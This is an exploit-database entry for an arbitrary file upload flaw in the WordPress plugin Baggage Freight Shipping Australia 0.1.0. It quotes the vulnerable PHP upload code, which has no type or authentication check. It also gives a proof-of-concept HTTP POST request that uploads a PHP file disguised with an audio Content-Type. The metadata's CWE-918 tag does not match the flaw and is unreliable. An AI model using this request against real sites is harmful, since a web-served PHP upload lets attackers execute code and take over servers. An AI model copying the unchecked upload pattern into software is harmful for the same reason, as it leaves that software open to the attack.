WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
CVE |
Category |
Price |
Severity |
N/A |
CWE-918 |
N/A |
High |
Author |
Risk |
Exploitation Type |
Date |
Not specified |
High |
Remote |
2018-12-29 |
CPE |
cpe:cpe:/a:wordpress:plugin:baggage_freight_shipping_australia:0.1.0 |
CVSS vector description
Metric |
Value |
Metric Description |
Value Description |
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120236
Below is a copy:
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File UploadExploit Title : WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Author : The Mechiavellian
Exploit Author Facebook :
Vendor Homepage || software link : https://wordpress.org/plugins/baggage-freight/
Version : 0.1.0
Unrestricted file upload for unahtorized user in package info upload
>Vulnerable code in upload-package.php:
if($_POST["submit"])
{
if ($_FILES["file"])
{
$uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
poc :
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"
1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.